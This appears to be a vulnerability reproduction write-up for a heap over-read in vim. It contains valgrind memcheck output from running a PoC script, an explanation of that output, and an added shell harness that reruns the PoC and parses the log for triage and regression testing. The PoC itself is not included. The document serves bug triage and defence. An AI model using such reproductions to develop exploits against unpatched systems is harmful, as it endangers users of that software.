Vulnerability Reproduction
$ valgrind vim -u NONE -i NONE -n -m -X -Z -e -s -S poc4min2.txt -c :qa!
==17304== Memcheck, a memory error detector
==17304== Copyright (C) 2002-2017, and GNU GPL'd, by Julian Seward et al.
==17304== Using Valgrind-3.18.1 and LibVEX; rerun with -h for copyright info
==17304== Command: vim -u NONE -i NONE -n -m -X -Z -e -s -S poc4min2.txt -c :qa!
==17304==
==17304== Invalid read of size 1
==17304==    at 0x331C4F: ??? (in /usr/bin/vim.basic)
==17304==    by 0x200FE0: ??? (in /usr/bin/vim.basic)
==17304==    by 0x200E84: ??? (in /usr/bin/vim.basic)
==17304==    by 0x200E84: ??? (in /usr/bin/vim.basic)
==17304==    by 0x201178: ??? (in /usr/bin/vim.basic)
==17304==    by 0x20218A: ??? (in /usr/bin/vim.basic)
==17304==    by 0x1AB4D7: ??? (in /usr/bin/vim.basic)
==17304==    by 0x27B4BD: ??? (in /usr/bin/vim.basic)
==17304==    by 0x27C260: ??? (in /usr/bin/vim.basic)
==17304==    by 0x1AB4D7: ??? (in /usr/bin/vim.basic)
==17304==    by 0x32AA1D: ??? (in /usr/bin/vim.basic)
==17304==    by 0x138D74: ??? (in /usr/bin/vim.basic)
==17304==  Address 0x57fcea4 is 0 bytes after a block of size 4 alloc'd
==17304==    at 0x483C839: malloc (in /usr/libexec/valgrind/vgpreload_memcheck-amd64-linux.so)
==17304==    by 0x207339: ??? (in /usr/bin/vim.basic)
==17304==    by 0x207E53: ??? (in /usr/bin/vim.basic)
==17304==    by 0x201A38: ??? (in /usr/bin/vim.basic)
==17304==    by 0x20245D: ??? (in /usr/bin/vim.basic)
==17304==    by 0x1AB4D7: ??? (in /usr/bin/vim.basic)
==17304==    by 0x27B4BD: ??? (in /usr/bin/vim.basic)
==17304==    by 0x27C260: ??? (in /usr/bin/vim.basic)
==17304==    by 0x1AB4D7: ??? (in /usr/bin/vim.basic)
==17304==    by 0x32AA1D: ??? (in /usr/bin/vim.basic)
==17304==    by 0x138D74: ??? (in /usr/bin/vim.basic)
==17304==    by 0x4FDB0B2: (below main) (libc-start.c:308)
==17304==
==17304==
==17304== HEAP SUMMARY:
==17304==     in use at exit: 96,286 bytes in 582 blocks
==17304==   total heap usage: 1,495 allocs, 913 frees, 346,853 bytes allocated
==17304==
==17304== LEAK SUMMARY:
==17304==    definitely lost: 0 bytes in 0 blocks
==17304==    indirectly lost: 0 bytes in 0 blocks
==17304==      possibly lost: 1,352 bytes in 18 blocks
==17304==    still reachable: 94,934 bytes in 564 blocks
==17304==                       of which reachable via heuristic:
==17304==                         newarray           : 1,536 bytes in 16 blocks
==17304==         suppressed: 0 bytes in 0 blocks
==17304== Rerun with --leak-check=full to see details of leaked memory
==17304==
==17304== For lists of detected and suppressed errors, rerun with: -s
==17304== ERROR SUMMARY: 1 errors from 1 contexts (suppressed: 0 from 0)
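What the output above establishes is a one-byte heap over-read: memcheck reports an "Invalid read of size 1" at an address "0 bytes after a block of size 4", i.e. the read lands exactly one byte past the end of a 4-byte malloc'd allocation. The "???" frames mean /usr/bin/vim.basic carries no symbol information, so the trace gives addresses only; to get function names, re-run the same command against a vim built with -g (or with the distribution's debug symbols installed). The harness below is an added example, not code from the original write-up or from the vim project. It wraps the reproduction command so that a memcheck error becomes a non-zero exit status (the value 99 is an arbitrary choice), and it parses the key lines of a memcheck log so the result can be triaged by script; the PoC path poc4min2.txt, the log path valgrind.log, and the embedded sample log (a trimmed copy of the output above) are assumptions made for the example.

```shell
#!/bin/sh
# Added harness around the reproduction command (not code from the original
# write-up). Assumptions: the PoC is ./poc4min2.txt and the memcheck log is
# written to ./valgrind.log; both can be overridden via the environment.
POC=${POC:-poc4min2.txt}
LOG=${LOG:-valgrind.log}

# Re-run the PoC under memcheck. --error-exitcode=99 turns "at least one
# error reported" into exit status 99, so a bisect or CI job can gate on it
# instead of grepping stdout. The vim flags match the original command: no
# vimrc/viminfo/swap file (-u NONE -i NONE -n), no writes (-m), restricted
# mode (-Z), no X11 (-X), silent Ex mode (-e -s) sourcing the PoC (-S) and
# then quitting (-c :qa!).
reproduce() {
    valgrind --error-exitcode=99 -s --log-file="$LOG" \
        vim -u NONE -i NONE -n -m -X -Z -e -s -S "$POC" -c ':qa!' </dev/null
}

# Number of errors from the ERROR SUMMARY line of a memcheck log.
error_count() {
    sed -n 's/^==[0-9]*==[ ]*ERROR SUMMARY: \([0-9][0-9]*\) errors.*/\1/p' "$1"
}

# Kind of the first reported error, e.g. "Invalid read of size 1".
first_error_kind() {
    sed -n 's/^==[0-9]*==[ ]*\(Invalid [a-z]* of size [0-9][0-9]*\).*/\1/p' "$1" | head -n 1
}

# Size of the heap block the faulting address lies just past. "0 bytes after
# a block of size N" means the access is one byte beyond an N-byte allocation.
overrun_block_size() {
    sed -n 's/^==[0-9]*==[ ]*Address 0x[0-9a-f]* is [0-9]* bytes after a block of size \([0-9][0-9]*\).*/\1/p' "$1" | head -n 1
}

# Triage a log: one summary line; non-zero exit if memcheck reported errors.
triage() {
    n=$(error_count "$1")
    printf 'errors=%s kind=%s overrun_block=%s\n' \
        "${n:-0}" "$(first_error_kind "$1")" "$(overrun_block_size "$1")"
    [ "${n:-0}" -eq 0 ]
}

# Constructed sample: a trimmed copy of the memcheck output from the
# reproduction, so the parsers can be exercised without valgrind or the PoC.
SAMPLE_LOG=$(mktemp)
trap 'rm -f "$SAMPLE_LOG"' EXIT
cat >"$SAMPLE_LOG" <<'EOF'
==17304== Invalid read of size 1
==17304==    at 0x331C4F: ??? (in /usr/bin/vim.basic)
==17304==    by 0x200FE0: ??? (in /usr/bin/vim.basic)
==17304==  Address 0x57fcea4 is 0 bytes after a block of size 4 alloc'd
==17304==    at 0x483C839: malloc (in /usr/libexec/valgrind/vgpreload_memcheck-amd64-linux.so)
==17304==    by 0x207339: ??? (in /usr/bin/vim.basic)
==17304== ERROR SUMMARY: 1 errors from 1 contexts (suppressed: 0 from 0)
EOF

triage "$SAMPLE_LOG" || true

# Only run the real reproduction when valgrind, vim and the PoC are present.
if command -v valgrind >/dev/null 2>&1 && command -v vim >/dev/null 2>&1 && [ -f "$POC" ]; then
    reproduce && rc=0 || rc=$?
    echo "valgrind exit status: $rc (99 = memcheck reported errors)"
    triage "$LOG" || true
fi
```

With the PoC in place, `POC=poc4min2.txt sh harness.sh` re-runs the reproduction and prints `errors=1 kind=Invalid read of size 1 overrun_block=4` for a log like the one above; the non-zero status from `triage` (or the 99 from valgrind itself) is what a bisect over vim versions or a regression job should key on, rather than on the text of the stack trace, which changes with every build.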